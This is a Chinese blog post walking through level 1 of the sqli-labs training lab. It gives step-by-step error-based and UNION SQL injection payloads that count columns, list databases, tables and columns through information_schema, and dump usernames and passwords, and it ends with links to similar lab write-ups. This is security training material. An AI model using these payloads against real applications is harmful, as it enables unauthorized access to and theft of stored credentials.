sqlilab第一关

最新推荐文章于 2024-05-06 15:38:01 发布
最新推荐文章于 2024-05-06 15:38:01 发布
阅读量1.9k 收藏 4
点赞数 2
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45491497/article/details/107634030
版权

1.判断注入方式为字符型

输入正常id=1

注入引号

可以推断查询语句为select * from  users where id=1 limit 0,1; (ps:users表只是举例)

打开第一关的php源码查看结果

打开数据库命令行查询结果

2.查询库名

<1>判断表有几列

当输入order by 3时未报错,而order by 4报错,说明表有三列

<2>判断回显的位置

为了union后的语句可生效,需将之前的报错,改为-1

select 1,2,3 --+   ,数字可以为任意,--+注释掉查询语句后的单引号,使其闭合

<3>显示库名

此处选择在第二列显示库名: ?id=-1' union select 1,(select group_concat(schema_name) from+information_schema.schemata),3 --+

小注:group_concat函数的作用

该表只有一个字段,故group_concat将相同字段在同一行显示

3.查询security表名

id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

4.查询User表中的字段名

id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

5.查询所有username,password的内容

id=-1' union select 1,(select group_concat(username) from security.users),3 --+

id=-1' union select 1,(select group_concat(password) from security.users),3 --+

 参考链接:

https://www.cnblogs.com/cnsec/p/11830682.html

吟缺斯汀
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs第一关
weixin_69147946的博客
11-11 454
sqli-labs靶机笔记
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8699
sql注入集合
SQLI-labs-第十五关和第十六关
最新发布
weixin_54055099的博客
05-06 869
Sqlilab的第十五关和十六关,时间盲注
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1283
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqlilab学习打卡|手工注入|Less-1 to Less-10
spring!
03-28 1984
sqlilab学习打卡|手工注入|Less-1 to Less-10
sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3925
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
dvwa+sqlilab+burp+phpstudy所需安装包.rar
11-08
搭建phpstudy环境,并在phpstudy环境下搭建sqlilab和dvwa,安装dvwa 具体配置详见https://blog.csdn.net/qq_37077262/article/details/102945140
第三节 Sqli-lab环境搭建-01
09-15
Sqli-Lab提供了一个交互式的学习环境,帮助我们学习SQL注入漏洞检测和利用。 课程总结 在本节中,我们学习了如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
sqli-lab操作详解
07-12
`sqli-lab`是一个用于学习和实践SQL注入的在线平台,它模拟了多种类型的SQL注入漏洞,帮助用户了解并掌握SQL注入的攻防技巧。通过完成`sqli-lab`的各个挑战,你可以深入理解不同类型的SQL注入,如基于错误的注入、...
通过sqli-labs学习sql注入——基础挑战之less1-10
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-labs实战记录(一)
0verWatch的博客
08-29 3154
前言 最近啊先自己SQL注入确实不行,我只能拿出sql注入的基础部分来练练收了,这个实验环境是sqlilabs 一些前置知识 系统函数 介绍几个常用函数: 1. version()——MySQL 版本 2. user()——数据库用户名 3. database()——数据库名 4. @@datadir——数据库路径 5. @@version_compile_os——操作系统版本 字...
sqli-labs练习(七)-----GET-Dump into outfile-String
wkend的博客
04-22 2027
根据提示,输入id参数1 输入1'出现报错信息,可是并没有错误的描述信息 输入1",返回正常 这里和前面基本一样,只有两种回显结果,但是唯一的区别就是错误回显并没有详细的错误描述。这下不好办了,怎么才能从数据库得到我们想要的数据呢??? 注意返回正常时的回显语句You are in.... Use outfile......可以看到,这里给出了提示Use outfile...
sqli abs Less-1详解
weixin_43713000的博客
01-25 473
SQL 注入靶场 Sqli labs SQLI-LABS是一个开源靶机; 它将sql注入分为了 basic基本、advanced进阶、stacked堆叠注入、challenges挑战 四个等级; 含有60余个sql注入关卡,较全面的收纳了get及post包下的各类sql注入 方式环境 Less-1 Error Based- String GET - Error based - Single quotes - String (基于错误的GET单引号字符型注入) 第一关是基于字符串的单引号错误 首先在链.
sqli-labs 下载+安装(windows)
半夜好饿的博客
04-08 2万+
写在前面的话: emmm,之前的bugku的web不更新了,大概十一月初做完了,然而我太懒了,一直没写博客,so,不想写了,新玩了个东西------sqli-labs,弄sql注入的,如果我勤快的话,就持续更吧。 sqli-labs简介: 一个印度印度程序员的杰作,挺有意思的,把它做成了闯关式的游戏,也发了一套相关的视频,油管上可以看,国内也有地址:https://pan.baidu.com/s/...
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
sqli-labs-master 闯关第一关,单引号 ' 字符型注入
qq_39030256的博客
11-18 2667
sqli-labs-master第一关 注:%23为#的url编码 第一关比较简单,在最上面的url后面手动输入http://localhost/sql/sqli-labs-master/Less-1/?id=1可以直接看到用户名密码,同样http://localhost/sql/sqli-labs-master/Less-1/?id=2可以看到另一个用户名密码,以此类推。但是呢,我们要用手动...
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqlilabs 第一关
11-11
根据提供的引用内容,sqlilabs是一个SQL注入漏洞练习平台,第一关是Less-8,它是一个基于错误的注入漏洞。攻击者可以通过构造恶意的SQL语句来获取数据库中的敏感信息。以下是Less-8的解决方案: 1. 在用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值